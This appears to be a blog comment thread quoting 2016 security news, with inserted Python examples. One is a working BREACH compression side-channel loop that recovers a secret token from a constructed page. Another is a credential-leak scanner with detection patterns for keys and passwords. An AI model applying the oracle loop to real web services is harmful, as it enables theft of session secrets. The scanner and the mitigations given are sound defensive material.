    Trend Micro issued a patch for the flaw on Wednesday, a little over a week after Ormandy reported the bug to it on 22 March. The patch is not complete but does address the most critical issues at hand, according to Trend.

    Ormandy, a top bug hunter on the Google Project Zero team, has carved out a particular speciality in rooting out security flaws of anti-virus products, uncovering bugs in technology from ESET, FireEye, Kaspersky and Avast.

    Reply
  11. Tomi Engdahl says:

    Teens would sell their personal data instead of working
    https://nakedsecurity.sophos.com/2016/03/30/teens-would-prefer-to-sell-their-personal-data-rather-than-work/

    Teens are well aware of the value of their personal data.

    In fact, it’s about as valuable as a large pizza.

    For the not-so-princely sum of £15 (call it $20), 42% of survey respondents said they’d rather give away their personal data than work at a job to earn the cash, according to a new study.
    This is what the kids said they’re “mostly happy” to exchange personal data for:

    Sharing location data with university to help use facilities or campus better, improve personal safety (39%).
    Health data being monitored and shared with medical staff to better diagnose (37%).
    Biometric data passwords (42%).

    On the other hand, this sort of data sharing made them “mostly unhappy”:

    Organizations sharing data with third parties (60%).
    Movement tracked in-store via personal device for marketing purposes (41%).
    Online habits used to provide targeted ads and promotions (50%).
    Location data used or shared (54%).

    Unlocking the keys to a teen’s data-sharing heart is pure gold to marketers, of course.

    The Truth Behind UK’s Future Workforce: £15 the Value of Privacy, Coders in Every Classroom
    http://www.uk.logicalis.com/news/the-truth-behind-uks-future-workforce-15-the-value-of-privacy-coders-in-every-classroom/

    A nationwide survey of 1000 13-17 year olds has revealed a growing number of digitally literate teens able to code, hack, and who are happy to swap their personal information in return for cash. The findings are published today in the eighth annual Realtime Generation report commissioned by Logicalis UK, entitled ‘The Age of Digital Enlightenment’.

    A day-in-the-life of a UK teen is mobile (93% own a smartphone) and includes nine hours online, consuming, publishing or creating content. For this generation, there is an app for everything and, if one doesn’t exist, a growing number (18% currently) are acquiring the coding skills to build their own.

    Reply
  12. Tomi Engdahl says:

    Mike Perry / The Tor Blog blogs:
    Tor says CloudFlare’s claim that 94% of requests from Tor are malicious is likely based on flawed methodology, asks for explanation

    The Trouble with CloudFlare
    https://blog.torproject.org/blog/trouble-cloudflare

    Wednesday, CloudFlare blogged that 94% of the requests it sees from Tor are “malicious.” We find that unlikely, and we’ve asked CloudFlare to provide justification to back up this claim. We suspect this figure is based on a flawed methodology by which CloudFlare labels all traffic from an IP address that has ever sent spam as “malicious.” Tor IP addresses are conduits for millions of people who are then blocked from reaching websites under CloudFlare’s system.

    Reply
  13. Tomi Engdahl says:

    Reuters:
    Sources: Egypt blocked Facebook’s Free Basics service after the company refused to let the government spy on users — Exclusive: Egypt blocked Facebook Internet service over surveillance – sources — Egypt blocked Facebook Inc’s (FB.O) Free Basics Internet service at the end of last year …

    Exclusive: Egypt blocked Facebook Internet service over surveillance – sources
    http://www.reuters.com/article/us-facebook-egypt-idUSKCN0WY3JZ

    Egypt blocked Facebook Inc’s (FB.O) Free Basics Internet service at the end of last year after the U.S. company refused to give the Egyptian government the ability to spy on users, two people familiar with the matter said.

    Mohamed Hanafi, a spokesman for Egypt’s Ministry of Communication, declined to comment specifically on the allegation about surveillance demands but cited other reasons for Free Basics to be blocked.

    “The service was offered free of charge to the consumer, and the national telecommunication regulator saw the service as harmful to companies and their competitors,” he said.

    Free Basics, which is available in 37 countries that have large populations without reliable Internet service, is central to Facebook’s global strategy.

    Reply
  14. Tomi Engdahl says:

    Salvador Hernandez / BuzzFeed:
    FBI Tells Local Law Enforcement It Will Help Unlock Phones — A law enforcement official told BuzzFeed News the FBI sent the advisory to local authorities on Friday in order to provide them with “technical assistance.” — Just days after breaking into a terrorist’s iPhone using …

    FBI Tells Local Law Enforcement It Will Help Unlock Phones
    http://www.buzzfeed.com/salvadorhernandez/fbi-tells-local-law-enforcement-it-will-help-unlock-phones#.qcaQ50dgMK

    A law enforcement official told BuzzFeed News the FBI sent the advisory to local authorities on Friday in order to provide them with “technical assistance.”

    Reply
  15. Tomi Engdahl says:

    Hacker reveals $40 attack that steals police drones from 2km away
    No encryption in pro-grade drones: just sniff Wi-Fi and copy signals
    http://www.theregister.co.uk/2016/04/01/hacker_reveals_40_attack_to_steal_28000_drones_from_2km_away/

    Black Hat Asia IBM security guy Nils Rodday says thieves can hijack expensive professional drones used widely across the law enforcement, emergency, and private sectors thanks to absent encryption in on-board chips.

    Rodday says the €25,000 (US$28,463, £19,816, AU$37,048) quadcopters can be hijacked with less than $40 of hardware, and some basic knowledge of radio communications.

    With that in hand attackers can commandeer radio links to the drones from up to two kilometres away, and block operators from reconnecting to the craft.

    The drone is often used by emergency services across Europe, but the exposure could be much worse; the targeted Xbee chip is common in drones everywhere and Rodday says it is likely many more aircraft are open to compromise.

    The Germany-based UAV boffin worked with the consent and assistance of the unnamed vendor to pry apart the internals of the drone and the Android application which controls it.

    Reply
  16. Tomi Engdahl says:

    Facebook To Slurp Oculus Rift Users’ Every Move
    http://hackaday.com/2016/04/04/facebook-to-slurp-oculus-rift-users-every-move/

    The web is abuzz with the news that the Facebook-owned Oculus Rift has buried in its terms of service a clause allowing the social media giant access to the “physical movements and dimensions” of its users. This is likely to be used for the purposes of directing advertising to those users and most importantly for the advertisers, measuring the degree of interaction between user and advert. It’s a dream come true for the advertising business, instead of relying on eye-tracking or other engagement studies on limited subsets of users they can take these metrics from their entire user base and hone their offering on an even more targeted basis for peak interaction to maximize their revenue.

    Oculus Rift terms and conditions allow Facebook to monitor users’ movements and use it for advertising
    http://www.independent.co.uk/life-style/gadgets-and-tech/news/oculus-rift-terms-and-conditions-allow-company-to-monitor-users-movements-and-use-it-for-advertising-a6967216.html

    The Facebook-owned company’s VR headset installs a piece of software that keeps watch of when people are using it — and can send that off to other firms

    Oculus Rift appears to collect information on the people wearing it and send all of that back to other companies, according to its terms and conditions.

    Oculus, the virtual reality firm which was bought out by Facebook in 2014, is sending the first versions of its consumer headset out to users. But some are already pointing out terrifying parts of the terms of service that people sign up to use it.

    When the headset’s software is installed on a computer, it adds a process that allows the PC to watch what the headset is doing and send that back to Oculus. That allows the headset to know when it is being used and turn itself on — but it also allows the company to collect information on people’s head movements and activity and send it back to advertisers.

    “We use the information we collect to send you promotional messages and content and otherwise market to you on and off our Services,” the terms read. “We also use this information to measure how users respond to our marketing efforts.”

    Reply
  17. Tomi Engdahl says:

    Taliban Launches Smartphone App to Recruit and Spread Propaganda
    http://fortune.com/2016/04/03/taliban-launches-smartphone-app/

    The Afghani group is playing catch-up with the more tech-savvy ISIS.

    The terrorist monitoring organization SITE reported on Friday that the Afghani Taliban has developed and released an Android application, making it available on Google’s Play store.

    Reply
  18. Tomi Engdahl says:

    Spies rejoice! Gmail, Facebook Messenger BREACHed once again
    Thrice-upgraded attack framework now 500 times faster with badass modular Rupture framework
    http://www.theregister.co.uk/2016/04/04/spies_rejoice_gmail_facebook_messenger_breached_once_again/

    Research pair Dimitris Karakostas and Dionysis Zindros have upgraded their attack (codenamed BREACH) that pierces the web’s most common ciphers, and released a framework to help well-heeled hackers and state-sponsored spies spy on the likes of Facebook and Gmail.

    At Black Hat Asia, the pair demonstrated once again how secure traffic from popular web services can be stolen, despite efforts to seal off the now three-year-old original attack vector.

    The newest iteration is now more capable: attackers using the optimised BREACH (Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext) can target noisy end-points that use sluggish block ciphers, including AES 128 bit.

    They say it’s also 500 times faster than the original attack; browser parallelisation is sped up by a factor of six, while requests are now 16 times faster.

    Launching an attack is not child’s play. They told The Register it would take weeks to successfully compromise a target.

    Reply
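Added example, not from the researchers or The Register: the core of the original BREACH size oracle in Python, run against a constructed page that holds a secret token and reflects an attacker-controlled query into the same body. It goes beyond the article in running the complete recovery loop (16 hex characters, 256 requests) rather than describing a single measurement. The page, the token and the use of zlib's static Huffman tables (Z_FIXED) to make the size oracle bit-exact are simplifications chosen here; the compressed length is measured before encryption, which is what a stream cipher leaks directly. The 2016 work targets dynamic Huffman tables and block-cipher padding, which is why it needs far more requests and, per the researchers, weeks per target.

```python
import zlib

HEX = "0123456789abcdef"
# Constructed token for the demonstration (not from the article).
SECRET = "9d2b4f7a1c8e6035"


def render_page(query: str, secret: str = SECRET) -> bytes:
    """Toy server response with both BREACH ingredients: a secret in the body
    (an anti-CSRF token) and an attacker-controlled string reflected into the
    same body (the search query). The query is deliberately not HTML-escaped:
    the attacker needs the quote and equals sign to land verbatim."""
    return (
        "<html><head><title>Account</title></head><body>\n"
        '<form action="/transfer" method="post">\n'
        f"<input type=\"hidden\" name=\"csrf\" value='{secret}'>\n"
        '<input type="submit">\n'
        "</form>\n"
        f'<div id="search">You searched for: {query}</div>\n'
        "</body></html>\n"
    ).encode()


def wire_length(body: bytes) -> int:
    """Bytes an on-path attacker sees after HTTP compression.

    Z_FIXED (static Huffman tables) makes every symbol cost a known number of
    bits: a wrong guess costs exactly one extra 8-bit literal, so lengths
    separate cleanly even on this tiny page. Real servers use dynamic tables,
    which adds noise that the BREACH paper handles with padding and its
    'two tries' trick."""
    z = zlib.compressobj(9, zlib.DEFLATED, 15, 9, zlib.Z_FIXED)
    return len(z.compress(body) + z.flush())


def recover_secret(oracle, known: str = "value='", length: int = len(SECRET),
                   alphabet: str = HEX, window: int = 6) -> str:
    """Byte-by-byte recovery. oracle(reflected) returns the compressed length
    of the page with `reflected` echoed into it. For each position every
    candidate is tried once; the shortest response is the one where LZ77 could
    extend its back-reference into the secret by one more byte.

    Only the last `window` known bytes are sent so the match length stays
    inside one DEFLATE length-code bucket (3..10) and the size difference is
    always a whole byte; a long prefix occasionally straddles a bucket
    boundary and produces ties."""
    recovered = ""
    for _ in range(length):
        prefix = (known + recovered)[-window:]
        sizes = {c: oracle(prefix + c) for c in alphabet}
        recovered += min(sizes, key=sizes.get)
    return recovered


if __name__ == "__main__":
    oracle = lambda q: wire_length(render_page(q))
    print("recovered:", recover_secret(oracle), "actual:", SECRET)
```

The mitigations follow from the loop: no compression of responses that mix secrets with reflected input, per-request randomised (masked) CSRF tokens so the oracle has nothing stable to extend, and rate limiting the 256-requests-per-token pattern.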
  19. Tomi Engdahl says:

    Did hacktivists really just expose half of Turkey’s entire population to ID theft?
    Entire citizen database supposedly leaked via a torrent
    http://www.theregister.co.uk/2016/04/04/turkey_megaleak/

    A trove of leaked information, purported to be the entire Turkish citizenship database, has been leaked.

    The leaked info appears to contain names, addresses and ID numbers of more than 49 million citizens. If confirmed, the leak would become one of the biggest privacy breaches, by number of records, ever.

    The leaked info weighs in at 6.6GB uncompressed and is searchable.

    Those behind the leak imply that it was politically motivated, aimed against Turkey’s controversial president Recep Tayyip Erdoğan.

    Turkey’s population is 79 million, according to a 2015 census.

    Reply
  20. Tomi Engdahl says:

    Panama Papers: Massive Data Leak Exposes Corrupt World Leaders and Tax Havens
    http://www.securityweek.com/panama-papers-massive-data-leak-exposes-corrupt-world-leaders-and-tax-havens

    2.6 Terabytes of Leaked Documents From Panama Law Firm Mossack Fonseca Expose World Leaders, Tax Havens and Shell Companies

    We now know from the Panama Papers, a massive leak of documents from the Panamanian firm Mossack Fonseca, that Putin is just one of a large number of world leaders, businessmen and celebrities allegedly involved in tax avoidance through off-shore companies. The legal, political and financial ramifications from this leak will rumble on for years; but our concern here is not what was leaked, but by whom, how and to a lesser degree, why.

    The basic facts are these. An anonymous source contacted Süddeutsche Zeitung (SZ) more than a year ago and provided encrypted internal documents from Mossack Fonseca. In the following months the supply grew to a massive 2.6 terabytes of data, containing 4.8 million emails, 2.2 million PDFs, and millions more database formats, images and text documents.

    These documents needed to be analyzed, and Süddeutsche Zeitung called on the International Consortium of Investigative Journalists (ICIJ) to help.

    The reality is that we will need to wait for the reports from forensic investigators before any conclusion can be reached on who hacked Mossack Fonseca and even then we may not get the whole truth.

    Reply
  21. Tomi Engdahl says:

    U.S. Electric Grid – America the Vulnerable
    http://www.securityweek.com/us-electric-grid-america-vulnerable

    In the new digital age, the threat of cyber attack reaches every part of modern society. Electrical power runs just about every aspect of life for most people, and most are not prepared when the power source is interrupted or goes away. A public announcement could be made one week ahead of time, and the majority of people would still be in the same vulnerable position if the power were to go away abruptly.

    Last year Lloyd’s published a report titled “Business Blackout” where they shared their analysis and findings of an imminent cyber attack on the U.S. power grid. In their attack scenario, attackers were able to inflict physical damage on 50 of the 700 generators on the electrical grid on the east coast where there is a substantial population of people in major cities that includes New York City, Washington D.C. and Boston. In this situation, 93 million people were affected by a blackout.

    There would most certainly be mass chaos among the population, and the total impact to the USA in the Lloyd’s report is estimated at $243 billion dollars and rising to over $1 trillion in extreme cases. In an already fragile and recovering economy, an attack like this could cripple the country and most certainly disrupt any momentum the economy had been able to gain.

    Not only is this scenario possible, I believe it is imminent. Based on existing intelligence, it is reasonable to assume that nation-states already possess all the information they need to launch such an attack on the U.S. power grid – they choose not to because of political implications. I also believe the USA possesses the same capabilities. It isn’t just nation-states that we need to be concerned with, as radical terrorist groups are highly motivated to bring harm to the American people and economy.

    Within the energy sector, here are just a few examples of reported attacks or attempted attacks:

    • In 2012 and 2013 Russian hackers were able to successfully send and receive encrypted commands to the U.S. power generators.

    • The Department of Homeland Security (DHS) announced last year that unauthorized cyber hackers were able to inject malicious software into the grid operations that allowed spying on U.S. energy companies.

    • In October of last year, US law enforcement officials reported a series of cyber attacks that were attempted by ISIS targeting the U.S. power grid.

    • In December 2015, the Associated Press reported that “security researcher Brian Wallace was on the trail of hackers who had snatched a California university’s housing files when he stumbled into a larger nightmare: cyber attackers had opened a pathway into the networks running the United States power grid.”

    Homeland Security Deputy Secretary Alejandro Mayorkas acknowledged in an interview, “we are not where we need to be” on cybersecurity.

    The Good News – And Practical Tips to Reduce the Threat Surface

    Reply
  22. Tomi Engdahl says:

    Establishing Correspondence Between an Application and its Source Code
    http://www.securityweek.com/establishing-correspondence-between-application-and-its-source-code

    How Combining Two Completely Separate Open Source Projects Can Make Us All More Secure

    When you run an application, how can you verify that what you are running was actually built from the code that a trusted developer wrote?

    When you get the application from a distribution rather than from the developer, you are trusting that the distribution performed the same validation that you would have done (or better). Now you, as the end-user, get the installable package from the distribution. You install it on your system and you run the executable contained within the package. You don’t have to compile it because that is one of the value-added functions of the distributor. The package management system handles the verification of the package before it is installed.

    Now, as the end-user, how do you know that the executable that you were running is what the open source developer originally wrote? Many distributions alter the code before they ship it to apply bug patches and security fixes.

    The Reproducible Builds Project intends to solve that problem. The goal of the Reproducible Builds Project is to ensure that if a package is built on one system and then again on a different but similar system, the outputs are directly comparable. This can be verified using the diffoscope tool produced by the project or, in many cases, by comparing cryptographic hashes of the two packages to ensure that they are identical.

    The Reproducible Builds project is writing tools to facilitate comparison of two separately generated packages, fixing toolchain issues, and working with the upstream developers to fix any problems which cause the source not to be reproducibly buildable. Subtle corruptions of individual machines in a build system become detectable when previously reproducibly buildable packages suddenly start failing verification.

    In summary, the Reproducible Builds project is working to ensure the package will be identical to packages built on another similar system using the same source code so that the integrity of the package can be validated.

    The Integrity Measurement Architecture (IMA-appraisal) component of the Linux kernel has the capability of validating a file’s integrity based on the file’s signature stored as an extended attribute, before allowing the file to be accessed

    This model of integrity is not completely realized today. Some steps are not yet complete – IMA is still considered experimental, patches to Debian packaging system to include signed file hashes have been submitted, but not yet accepted, the Reproducible Builds Project has made amazing strides but work has not yet been completed.

    https://reproducible-builds.org/

    Reproducible builds are a set of software development practices which create a verifiable path from human readable source code to the binary code used by computers.

    Reply
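Added example, not the Reproducible Builds project's own tooling: two ways of packaging the same constructed source tree with Python's standard library. The naive one changes with the clock, the builder's uid and the file order, so two honest builds never compare equal; the pinned one rebuilds bit-for-bit from the same source. The manifest helper is a stand-in for diffoscope that shows which member fields caused a mismatch. The file names and the SOURCE_DATE_EPOCH value are assumptions.

```python
import gzip
import hashlib
import io
import tarfile

# Constructed source tree (not from the article)
SOURCE = {
    "src/main.c": b"int main(void) { return 0; }\n",
    "README": b"demo package\n",
}


def naive_build(files: dict, build_time: int, uid: int = 1000) -> bytes:
    """A typical packaging step: files in whatever order the filesystem gave
    them, each stamped with the build clock and the builder's uid, and gzip
    writing the current time into its own header."""
    buf = io.BytesIO()
    with gzip.GzipFile(fileobj=buf, mode="wb") as gz:          # header mtime = now
        with tarfile.open(fileobj=gz, mode="w") as tar:
            for name, data in files.items():                   # unsorted order
                info = tarfile.TarInfo(name)
                info.size, info.mtime, info.uid, info.gid = len(data), build_time, uid, uid
                tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def reproducible_build(files: dict, source_date_epoch: int = 0) -> bytes:
    """Same content with every source of variation pinned: sorted order,
    SOURCE_DATE_EPOCH instead of the wall clock, fixed owner and mode, and the
    gzip header mtime forced to 0. Anyone can rebuild and get identical bytes."""
    buf = io.BytesIO()
    with gzip.GzipFile(fileobj=buf, mode="wb", mtime=0) as gz:
        with tarfile.open(fileobj=gz, mode="w", format=tarfile.GNU_FORMAT) as tar:
            for name in sorted(files):
                data = files[name]
                info = tarfile.TarInfo(name)
                info.size, info.mtime, info.mode = len(data), source_date_epoch, 0o644
                info.uid = info.gid = 0
                info.uname = info.gname = "root"
                tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def digest(package: bytes) -> str:
    """The value a second builder publishes and a verifier compares."""
    return hashlib.sha256(package).hexdigest()


def manifest(package: bytes) -> list:
    """Per-member metadata plus content hash: enough to say *why* two packages
    differ (timestamps? owner? content?) rather than just that they do."""
    out = []
    with tarfile.open(fileobj=io.BytesIO(package), mode="r:gz") as tar:
        for m in tar.getmembers():
            content = tar.extractfile(m).read()
            out.append((m.name, m.mtime, m.uid, m.gid, m.mode,
                        hashlib.sha256(content).hexdigest()))
    return out


def explain_difference(a: bytes, b: bytes) -> list:
    """Pairs of member entries that differ between two packages."""
    ma, mb = sorted(manifest(a)), sorted(manifest(b))
    return [(x, y) for x, y in zip(ma, mb) if x != y]


if __name__ == "__main__":
    p1, p2 = naive_build(SOURCE, 1_700_000_000), naive_build(SOURCE, 1_700_000_060)
    print("naive builds identical:", digest(p1) == digest(p2))
    for x, y in explain_difference(p1, p2):
        print("  differs:", x, "vs", y)
    r1, r2 = reproducible_build(SOURCE), reproducible_build(SOURCE)
    print("reproducible builds identical:", digest(r1) == digest(r2), digest(r1)[:16])
```

The security payoff is in the second comparison: once the pinned build is deterministic, a package whose digest disagrees with an independent rebuild is a signal worth investigating (a compromised build host, a tampered toolchain), whereas with the naive build every rebuild disagrees and the signal is lost in noise.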
  23. Tomi Engdahl says:

    The Accountability Gap: Getting Business to Understand Security
    http://www.securityweek.com/accountability-gap-getting-business-understand-security

    A new survey and report from Tanium and NASDAQ, using a research team from Goldsmiths, University of London, seeks to quantify organizations’ cyber security vulnerability.

    The bottom-line conclusions from the response analysis will surprise no-one involved in cyber security – only 10% of respondents have a low level of vulnerability. The vast majority of organizations (80%) are deemed to have “a medium level of vulnerability.”

    This is mirrored in the report detail. For example, only 13% of the most vulnerable NEDs are briefed regularly on cybersecurity legislation and regulation, and just 8% are regularly briefed on current threats. This compares to 100% and 96% respectively for the least vulnerable. There is a close correlation between poor information exchange between Business and Security and a poor security posture.

    However, knowing there is a problem, and knowing what to do about it, are two different things.

    The real difficulty is in getting Business to accept that it needs to understand Security.

    The report’s own primary conclusion is that organizations need to ‘create a culture of openness’. “Boards need to know what questions to ask in order to understand the state of cybersecurity of the business. These can be supplemented by detailed in-house or externally facilitated briefings for directors to ensure they have the skills to provide adequate oversight. Board members need to learn how to ask questions the same way they do for financial concerns and, in some cases, certain board members responsible for cyber should be given extended training.”

    Reply
  24. Tomi Engdahl says:

    Cyber Situational Awareness and the Kill Chain
    http://www.securityweek.com/cyber-situational-awareness-and-kill-chain

    The concept of the cyber kill chain has done a lot to advance the general understanding of how attacks unfold and how to combat them. The steps – reconnaissance, weaponization, delivery, exploitation, installation, command and control, actions on objectives – each have implications for how, as security professionals, we can strengthen our defenses. Initially these defenses concentrated on the network, and specifically the perimeter. But today, as attacks have increased in sophistication and frequency, it takes more to be a kill chain “killjoy.”

    Take for example, the first step in the kill chain – reconnaissance. An adversary surveys the target and seeks out weaknesses, potential vectors, and other information to assist with an attack. Organizations traditionally address this step in a number of ways, including firewall or proxy logs, honeypots and network-based intrusion detection systems (NIDS). But, unfortunately, these only aim to detect threats that directly target the perimeter network and fail to address other important threats, such as data that already found a way outside the organization through many different means, including:

    • Stolen credentials available on sites, such as Pastebin

    • Sensitive documents being openly shared on the web due to misconfigured, consumer-grade storage devices or public folders in cloud storage sites like Dropbox that might reveal sensitive internal information

    • Proprietary source code and admin passwords that somehow find their way on code sharing sites, such as GitHub

    • Social media platforms that can potentially provide a gold mine of information that threat actors could use to craft a spear phishing campaign

    Reply
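Added example, not part of the SecurityWeek article: a small scanner for the kind of material the list above describes (cloud access keys, private keys, password assignments, high-entropy API tokens and e-mail addresses in your own domain), run over a constructed paste. The patterns, the entropy threshold and the example-corp.com domain are assumptions for this example; the AWS key ID is Amazon's documented placeholder value, not a real credential.

```python
import math
import re
from collections import Counter

# Detectors, tried in this order on every line: specific formats first, then a
# generic "<name> = <long token>" catch-all that is filtered by entropy.
# These are assumptions for the example, not an exhaustive rule set.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"),
    "password_assignment": re.compile(
        r"(?i)(?:password|passwd|pwd|secret)\s*[:=]\s*['\"]?([^\s'\"]{6,})"),
    "generic_token": re.compile(
        r"(?i)\b(?:api[_-]?key|token|auth)\b\s*[:=]\s*['\"]?([A-Za-z0-9+/=_\-]{20,})"),
}
ENTROPY_FLOOR = 3.5  # bits/char: placeholders and words fall below, real tokens above


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character (0 for a repeated char, roughly 4-5 for random base64)."""
    counts = Counter(s)
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def redact(secret: str) -> str:
    """Keep enough to locate the leak in the source, never the whole value."""
    return f"{secret[:4]}...{secret[-2:]}" if len(secret) > 8 else "***"


def scan(text: str, org_domain: str = None) -> list:
    """Scan a paste, commit or file for credential-shaped strings.

    Returns (line_no, detector, redacted_value) tuples. org_domain, if given,
    also flags e-mail addresses in your own domain: on a paste site those are
    usually the first sign that an internal document is out, not just a dump.
    """
    findings = []
    domain_re = (re.compile(rf"[\w.+-]+@{re.escape(org_domain)}\b", re.I)
                 if org_domain else None)
    for no, line in enumerate(text.splitlines(), 1):
        for name, rx in PATTERNS.items():
            m = rx.search(line)
            if not m:
                continue
            value = m.group(1) if m.groups() else m.group(0)
            if name == "generic_token" and shannon_entropy(value) < ENTROPY_FLOOR:
                continue  # "token = xxxxxxxx..." placeholder, not a leak
            findings.append((no, name, redact(value)))
        if domain_re:
            m = domain_re.search(line)
            if m:
                findings.append((no, "org_email", redact(m.group(0))))
    return findings


# Constructed sample paste. The AWS key ID is Amazon's documented placeholder.
SAMPLE_PASTE = """\
# prod config dump, untitled paste
DB_HOST=db01.internal
DB_PASSWORD=Sup3rS3cret!
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
token = xxxxxxxxxxxxxxxxxxxxxxxx
API_KEY: "c2VjcmV0LXRva2VuLWZvci1kZW1vLW9ubHk="
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA...
contact: jane.doe@example-corp.com
"""

if __name__ == "__main__":
    for line_no, kind, value in scan(SAMPLE_PASTE, org_domain="example-corp.com"):
        print(f"line {line_no:>2}  {kind:<20} {value}")
```

Pointed at your own repositories before each push it is a pre-commit hook; pointed at paste-site and public-repository search results for your domain it is the reconnaissance-stage monitoring the article says perimeter tooling cannot provide. Every hit should lead to rotation of the credential, not just deletion of the paste.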
  25. Tomi Engdahl says:

    The Case for a Virtual Security Box
    http://www.securityweek.com/case-virtual-security-box

    The abundance of security solutions flooding the market (and IT racks) has not resulted in any strong confidence for preventing cyber-attacks.

    • 400+ companies presented at the recent RSA conference.

    • About 10% of that number – 40-50 security products of different types – are typically deployed at any organization.

    • When surveyed, only 75% of security professionals were confident in their team’s ability to detect and respond to incidents. While this may not sound that bad, among those 75 percent, 6 in 10 did not believe their staff can handle anything beyond simple cybersecurity incidents.

    If you’ve been around the security industry the past years, you’re probably not surprised. Companies are adding more and more security solutions, some overlapping, with uncoordinated responses. The result is de-optimization of cyber security investment, accompanied by unmanageable noise, alerts and maintenance tasks.

    Can the rules of the game be changed?

    Let me introduce the concept of a “Virtual Security box.”

    Virtual Security Box – Orchestrating All Security Policies

    How would this work? First, the Virtual Security Box dynamically integrates with existing security products – whether it’s reputation, anti-malware, IDS/IPS, user and network behavior analysis, firewalls, antivirus or others. It transforms all security products and services into virtual security resources, decoupled from the underlying physical security infrastructure. To begin with, this provides a unified playground with a single security language, rather than disparate silos, each with its own rules, terminology etc.

    What are the other characteristics of the Virtual Security Box?

    • Mix and match. The Virtual Security Box analyzes and rates the quality of each of the existing security products. It then selects and assigns the most relevant and best security resource for each task, completely decoupled from the underlying physical security infrastructure. For example, to protect against a privilege escalation attack, it may select Product A to execute the ‘brute-force’ protection policy, and Product B to execute the ‘privilege escalation intrusion’ protection and ‘pre-attack probes’ policy.

    • Orchestration. A Virtual Security Box can create and update activity flows between logical resources and thus transform the siloed security infrastructure into a cyber security system that can react much faster and in a more efficient manner to emerging advanced attack campaigns. It can instantly identify and assess the risk and activate the right resource at the right time.

    Reply
  26. Tomi Engdahl says:

    What are you doing to spot a breach?
    It’s probably already happened, but you just haven’t seen it…
    http://www.theregister.co.uk/2016/03/08/spotting_modern_cyberthreats/

    Technology moves quickly, not just in legitimate business, but in the cybercriminal world too. Advanced attack tools are now available on the black market, lowering the barrier to entry for the average online lowlife. They are happy to target large and small organizations alike, and they only have to be lucky once.

    Security pros have been forced to prepare for a world of constant, sustained attack by understanding the threats and choosing the right measures to prepare for them. Companies are realising the extent of the threat and gearing up for it, say experts.

    “We have seen information security budgets increasing in the last 12 months to address the challenges that cyber crime is bringing to the organisation,” said Steve Durbin, managing director of the Information Security Forum.

    So what kinds of threats are they dealing with, and how can they prepare?

    What are the threats and where are they coming from?

    The cyberthreats facing modern companies fall into various categories, and they’re loosely linked to the type of cybercriminal that you’re dealing with and the kind of information that they’re after. Hacktivism has traditionally been characterised by attacks with a relatively low barrier to entry such as DDoS and web site defacements, for example.

    While hackers’ motives are frequently political or ideological, financial cybercriminals are interested purely in money, and are adept in their pursuit of it. Some will attempt to transfer money out of an organization, while others will focus on saleable information. Malware typically underpins a financial cybercrime attack.

    How do you live with attackers getting in, and continue to fight them?

    Over the years, the focus on keeping attackers out at all costs has shifted towards managing them when they break into an organization. Security professionals seem to be tacitly admitting that network intrusion is a question of ‘when’, rather than ‘if’.

    “15 years ago, the focus was keeping them out. Today, organizations are starting to realize they have to deal with a certain degree of compromise,” explained Stephen Northcutt, director of academic advising for the SANS Technology Institute.

    How do you distinguish between normal behaviour/threats

    Distinguishing between these different modes of behaviour is an important skillset for IT departments trying to spot attackers inside their network, but it’s doable with the right tools, say experts. It’s all a question of mathematics, said Northcutt.

    “Twenty years ago the US Navy spent about a million dollars for a bunch of PhD statisticians to determine that like groups of people using like systems have a very similar network traffic footprint,”

    Where do you start when choosing tools

    Training people to be security aware is an important part of stopping breaches, but CISOs will never eradicate those problems entirely. A technology layer provides a vital layer of protection. Don’t be distracted by emotions or industry buzzwords when choosing these tools, said Stevens.

    Best of breed vs holistic approach

    Should companies buy a single security platform offering a holistic approach, or focus on point solutions instead?

    “I would always vote on holistic, mainly because we aren’t seeing point channel solutions that are very effective,” said Stevens.

    Reply
  27. Tomi Engdahl says:

    Top Firefox extensions can hide silent malware using easy pre-fab tool
    The fix? No patch, just destroy all extensions.
    http://www.theregister.co.uk/2016/04/04/top_firefox_extensions_can_hide_silent_malware_using_easy_prefab_tool/

    Black Hat Asia The most popular Firefox extensions with millions of active users are open to attacks that can quietly compromise machines and pass Mozilla’s automated and human security tests.

    The extension reuse attacks exploit weaknesses in the structure of Firefox extensions such that malicious activity can be hidden behind legitimate functionality.

    For example, attackers could duplicate a popular but vulnerable extension to reuse attacks and write their own machine-pwning functionalities.

    The researchers explained that extensions run with elevated privileges and access to information, so a malicious extension could steal private browsing data, passwords, and sensitive system resources.

    The extensions vulnerable to the 255 reuse exploits found included NoScript with 2.5 million users, Video DownloadHelper with 6.5 million users, and GreaseMonkey with 1.5 million users. Adblock Plus with its 22 million users was unaffected.

    “We have a lot of trust placed in browser vendors … but if you think about it, really squint your eyes, the extension framework really is a backdoor for potentially untrusted third parties to run code in a highly-privileged context,” Robertson says.

    “We really shouldn’t have trust in the extension authors.

    “The combination of automated analysis, manual review, and extension-signing – the vetting model that underpins all of Firefox’s extension security – if something goes wrong, then all bets are off.”

    And things did go wrong. The pair were able to upload a malicious, but ultimately harmless, proof-of-concept extension to the Firefox extension shop, even passing a requested, more intensive ‘fully reviewed’ analysis. The extension, dubbed ValidateThisWebsite, contained 50 lines of code and no obfuscation.

    “The more power vulnerable extensions have, the easier it is for an evil extension to work,” Buyukkayhan says.

    “The full review is the highest level of security Mozilla has.”

  28. Tomi Engdahl says:

    Hackers demo persistent, quiet attacks through Windows DSC
    Desired State Configuration tool can create state of chaos
    http://www.theregister.co.uk/2016/04/05/audio_hackers_demo_persistent_quiet_attacks_through_windows_dsc/

    AUDIO from Black Hat Asia Forensics men Matt Hastings and Ryan Kazanciyan have flipped the Windows Desired State Configuration (DSC) into a covert persistence mechanism and weapon in a new attack vector to own Windows boxes.

    The Tanium security duo released the DSCompromised framework of Powershell scripts and modules that help attackers use DSC, while smoothing over otherwise confusing and undocumented bugs.

    They told Black Hat Asia in Singapore last week that attackers abusing DSC can continually and covertly re-infect Windows systems.

    The pair say they were keen to showcase the new attack and suggested defences to the security community before criminals find the vector on their own.

